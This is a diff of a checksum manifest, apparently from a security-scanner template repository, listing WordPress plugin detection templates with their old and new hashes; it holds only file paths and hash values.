-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:a001480c6b909494fe1f4070cf6c670c139b07aa +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:eb4d9530879bc3654b5405d6c440d6c0ae4f5f63 +http/technologies/wordpress/plugins/elementor.yaml:5c4428cd82dd20fee7512bcb7a65403c571caa74 +http/technologies/wordpress/plugins/elementskit-lite.yaml:324118b50925f77f9dfa4b755c0831a732ded340 +http/technologies/wordpress/plugins/enable-media-replace.yaml:0a4c7b25660544fe42e4f28ad6cab43356a0c055 +http/technologies/wordpress/plugins/envato-elements.yaml:4511f260339ec44d2ebfed92daf3db18647c6863 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:738aedddda5cb2e7fa18caa160bfc7ee06bde6b6 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:db50ba889d1090c9c4ea0cb9948152b677b1fa3c +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:07c728a0bddef498e244f9f348dff46efdfce0e5 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:abd4fcc472f9c550c8882c654c18616ede7e11de +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:b90b2fb08c611f6c2c4e96f43e8e7d47dc79fcc4 +http/technologies/wordpress/plugins/flamingo.yaml:bf9281c26bae477784595b5acce38f623bf3cc94 +http/technologies/wordpress/plugins/fluent-smtp.yaml:95c1e75b793560d0ce4bcff3e83de7bfb6a127d9 +http/technologies/wordpress/plugins/fluentform.yaml:b893c47b50b72b57fa7206726dc3107ef4d88f76 +http/technologies/wordpress/plugins/font-awesome.yaml:6b8d1f26d0ee4a75fa16af0bd711788ac53e3d2d +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:917644c134340d29c396f53103b827ee62e64339 +http/technologies/wordpress/plugins/formidable.yaml:2f1d42f12cc1397e0dcd1caa43a41c15316ec4da +http/technologies/wordpress/plugins/forminator.yaml:67a952ebaed99e0e9e38c8c9f164048da2941d55 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:4ba8429dca38e7f6c48a3c96d4c24bfdfa47b99b +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:1cc36bfb0067bcbdcd871f77ed3961ef01f7e5b9 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:ecbb8c5160f36dc4f4fae7f79a78449b700a3063 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:b8d0ff0ad4b2b9b0e0439e2c8917a01b2be8f261 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4c53f14c8e18b42ccaef95bdf644fd2d8656a888 +http/technologies/wordpress/plugins/google-site-kit.yaml:a5b39af0c8b3bfd846fc7f14e70cbb79a546c35f +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:addfcc12021715107f14892d20c13ef547dafa58 +http/technologies/wordpress/plugins/gtranslate.yaml:9a94a7a9c090cce3354deff614d669cbeb1ad3e1 +http/technologies/wordpress/plugins/gutenberg.yaml:4025147421296355beec4e090b87a2d3a97c91e5 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:085d8523d95a70f7c4a6d21b2ffd63132875402f http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5d91ecd7b324d78250c8a96d98fbe97d6339d068 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:2625baf3437cb8c96fa1c9c3db3b58cc7940856c +http/technologies/wordpress/plugins/header-footer.yaml:173804c6453fea12920ff2af337cf62df4ce08e7 +http/technologies/wordpress/plugins/health-check.yaml:7c1fc49b7ce8d7fde256d354589dbbb9260df4c5 +http/technologies/wordpress/plugins/hello-dolly.yaml:758b804388b625430f3b996a45ff6ed9bcbcdf4d +http/technologies/wordpress/plugins/host-webfonts-local.yaml:53aadff3f5f20e38cbfb0bb8bac4350aa88b4ea8 +http/technologies/wordpress/plugins/hostinger.yaml:d0cdd5b10d913f9a2f2e00ec3e7683bdc62c8c54 +http/technologies/wordpress/plugins/image-optimization.yaml:fa1438b8c8db5d74e4f04fb210c8d2eb13699970 +http/technologies/wordpress/plugins/imagify.yaml:9c6ce2dd3b6a3280c308389767c01cd4aa108c14 +http/technologies/wordpress/plugins/imsanity.yaml:0b13781af920a3c9df16d6b5f2bd2568bc1f642b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:b14083dbec46b830277147a1a9b9ad33d39eee69 +http/technologies/wordpress/plugins/instagram-feed.yaml:efe0d898f88b20e6c971efecc911096956adec87 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:863d05216d3766176eea61cf18bcfdc9c8d063ba http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:f269f11fc6b0001926e72de4807cbd242ede08ce +http/technologies/wordpress/plugins/jetpack.yaml:09c1d93db9ac8495f225acb97333275e6029db24 +http/technologies/wordpress/plugins/kadence-blocks.yaml:f1ac28aba2bfd9577b654c675f9e3d1c41202d68 +http/technologies/wordpress/plugins/kirki.yaml:1ecd4767d21c7cb8d59965bfc6a0009630ca265b +http/technologies/wordpress/plugins/leadin.yaml:aa4f5f7df7968f0fd0d9fc5fe16aac6bf0bb6f67 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:16b519b1d7ae7667f88140efb4664cf36b9f340e +http/technologies/wordpress/plugins/limit-login-attempts.yaml:4897a7a2960120a2503d6301eeb793e4bb9a845c +http/technologies/wordpress/plugins/litespeed-cache.yaml:54bf8904a0d7c73b0f35fcbec3391f43f99361d7 +http/technologies/wordpress/plugins/loco-translate.yaml:db5f9a520c6a3e3349e13260001a60667816db17 +http/technologies/wordpress/plugins/loginizer.yaml:8ab50e95c6f5f5289350edf0f2d17b9ad61db271 http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:6010c4ac2b0fa265a2ad482483fad79cd8daaa7d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:8430b2c3de6f3710b7b6e628e3634aa1652ab329 +http/technologies/wordpress/plugins/mailpoet.yaml:7dea4daa32c55efe3ed5d0a5bb38d1eeb749fa85 +http/technologies/wordpress/plugins/maintenance.yaml:6f094bea818bb6fc6673769518d414fd3e272aac +http/technologies/wordpress/plugins/mainwp-child.yaml:c4ec3fdf78b3a5a2b59da232b8424fa396d8e101 +http/technologies/wordpress/plugins/malcare-security.yaml:2c0289f5e53680947b5906a32d91e5808087cd2b +http/technologies/wordpress/plugins/megamenu.yaml:19efe6e4b145fc4c10e51bb0ce8d49fca7ecbc05 +http/technologies/wordpress/plugins/members.yaml:df7ef4e57a53e8f495672bef21e4efc66ff2714f +http/technologies/wordpress/plugins/meta-box.yaml:201f452624420b1a23c75ecd83fc71b1fecd518b +http/technologies/wordpress/plugins/metform.yaml:7bd202c89e967d58ed38079468cfb1c80f430718 +http/technologies/wordpress/plugins/ml-slider.yaml:f6d562b56d2bc4f619aec728714350fc482d096f +http/technologies/wordpress/plugins/newsletter.yaml:2f9e6303b342a0b067964e5e183820d300052448 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:b0616408adcf4ff89d5d0cf6465852028b806397 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:63590c3cbe7f2683ae0493b2366a046401b4fb3d +http/technologies/wordpress/plugins/ninja-forms.yaml:ca6b256a98492387d92b466c9bb4d0dd066dfd42 +http/technologies/wordpress/plugins/ocean-extra.yaml:1545e2a315be1c662c0f275a3158548b03a9113f +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:97dba8ac406a5e15fd7809130654991f01512a7f +http/technologies/wordpress/plugins/one-click-demo-import.yaml:8b5444ad4aa76bb680923263f5875a998cebb0a0 +http/technologies/wordpress/plugins/optinmonster.yaml:e24f4a6db15d694484d89c3599a13cd430d0df39 +http/technologies/wordpress/plugins/otter-blocks.yaml:5707737e37042ae6231b549f44993f9c9a02d6b1 +http/technologies/wordpress/plugins/password-protected.yaml:6d07835ad148e7788537f454e0b04c62de3aa773 +http/technologies/wordpress/plugins/pdf-embedder.yaml:634c063e2757dcf8a775e7017e16434592330911 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:055ec079df0f1db8bcf98f61b1cc32a1545b3124 +http/technologies/wordpress/plugins/pixelyoursite.yaml:fe160d3b85661cc98b39a6f160fdc71ace9025cf +http/technologies/wordpress/plugins/polylang.yaml:461abf060464d1f1156ae018851a3d5885f64437 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/popup-maker.yaml:c42624bd2d0a6fe32c44dfa5aeec1f72fbb67f67 +http/technologies/wordpress/plugins/post-smtp.yaml:3318419c8878c6a5471406f1068477aaf64431ed +http/technologies/wordpress/plugins/post-types-order.yaml:cce4e1aca5713ca2e01c24d6ca58a7e2ad725d9a +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:9ad41511f810ec1b961597cc92d3d9f5814a049f +http/technologies/wordpress/plugins/pretty-link.yaml:b6420029464717c88095adcb274bfbb21a31ff6a +http/technologies/wordpress/plugins/really-simple-captcha.yaml:9ea3c881f6cd4cb290ee97100e57e030338e6df8 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:185778d4a9541fd9b807e6f9067973f32bbde7f4 +http/technologies/wordpress/plugins/redirection.yaml:143567cc1c170bc0e54dc2ce98d9fbcf1b986550 +http/technologies/wordpress/plugins/redux-framework.yaml:12aea2336c6de788317ee468dc0e50303503d888 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:ef4e355c741b4d60571670a27ef54003b5029a6e +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:c35728b196a1d3b2bc3152770ca3c16ca33bfceb +http/technologies/wordpress/plugins/safe-svg.yaml:c74251162eeef443b61b36d29af9d2669de8057a +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:38bff8fb87e87972ef44c3de609adcc6f392bf35 +http/technologies/wordpress/plugins/sg-cachepress.yaml:9e27de27ad9cf5e0b0615cb714cfb9896b5f7c89 +http/technologies/wordpress/plugins/sg-security.yaml:82bb31adf015d31279c57bab69972b98ba4d2ff7 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2b51340cb26c1f3359bb76277633209923a9af51 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:46f0eaed430df7b0652bf9f0e68fcd66911878d5 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:53e694e88ab651a365cd9af45493b8e428f2a97c http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:3316f41749701dbb9c87119b51fa86853fc2fdd1 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:382aaa3c60d593b45f2acce717c58d71bb63db0b +http/technologies/wordpress/plugins/smart-slider-3.yaml:915999f961d683e82aa581571f4e297662d117e2 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:1c691ec52ceaa2cdf934e769c3d657f3cacf03a9 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b0b73d38068e1623ed4262dab78ba9b3dd0eaa31 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:8cbf2f2b489ee46245bb62d7ac5b2298a7eef61a +http/technologies/wordpress/plugins/sucuri-scanner.yaml:36dfadf3eaf00de528be16f12f3e34aa617dd6da http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:334733285e3627f5416feca5df9dd89ac91faf4f +http/technologies/wordpress/plugins/tablepress.yaml:f3fcc4bad9199cd1aca78c75a093d7b23e4b65b7 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:c0491d20b5b59729545cdf68cfb88346172acb75 +http/technologies/wordpress/plugins/templately.yaml:5b62413b897c47d3ae86d5e5b92ee75ceaf0856e +http/technologies/wordpress/plugins/the-events-calendar.yaml:87f10f88c8e44bc416536092aa5d591554817b0c http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:76022e8f7ef5517e05c6c59e573a7bfa55b4c121 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:adb0d3eafbafe1195ddb6477095d704778a8dc1a +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:975e3a1099ec6fad3eccc2566820dcf1e685ffda +http/technologies/wordpress/plugins/under-construction-page.yaml:3732901ea346a990c983d862b72b632cc1a09ae1 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:192fcb7b7fb8ab505313883440bf4b56cc8b8199 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:9a07be64d03f0057f9f3418b4e2f22af3fe3c8e4 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:32fc287b225ee5187b29fa9db688b3e8a10de4a3 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:f5ef65853e4102642c561aefb18f4a2a3cf738b3 +http/technologies/wordpress/plugins/webp-express.yaml:cb2c692702481e29e279b3efafa91942c342b22c +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:5483fa8794ae7790c5c42c689a9f754ea3f07b66 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:731ab6979ce9daafb6945d57a294575a4e16ee00 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:e0edbe4345b9310bf43798ae0da56ca339fac2a2 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f639503d1041219d839f06177a93cc4e1c125683 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:008839d74144ff033f920547a96bca6cfc81c4f0 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:6629c332ea3550d95e79b63dbbbc1490c6498e79 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:be1f5158fe2d84e9d0bbc38f555c0c0744991a57 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:649f5ae860b1b699c6278b929f2bf6f1f4b01dd5 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:bdf13f27fd04f4b55c741da62a8394bf501cc988 +http/technologies/wordpress/plugins/woocommerce-services.yaml:db3ba138c78b428608a2297fa163fc8242bd41e1 +http/technologies/wordpress/plugins/woocommerce.yaml:3d54c5afdbb12b79862abe00f70cc4e88157aebd +http/technologies/wordpress/plugins/wordfence.yaml:6c9fed80955cabc719854bd25f58bd0690160f35 +http/technologies/wordpress/plugins/wordpress-importer.yaml:31bb724946ce8b3f1910d411ef6cceb3a82299d0 +http/technologies/wordpress/plugins/wordpress-seo.yaml:e391bccb91671e970aad5f3c5e39ce6ff7843635 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:cbc1aab969c2ee6c8967ba58da4bf82c9813e057 +http/technologies/wordpress/plugins/wp-crontrol.yaml:6768e8111ee4bc3e03ea010ec819c8ae89307aac +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:c2f61ee62a8964c5c665f984215149110f742a37 +http/technologies/wordpress/plugins/wp-file-manager.yaml:0e6e0081e9084d64463458aa9be206502c567da5 +http/technologies/wordpress/plugins/wp-google-maps.yaml:e62d6ddece58a5ba16e84216c1f63ac36968f316 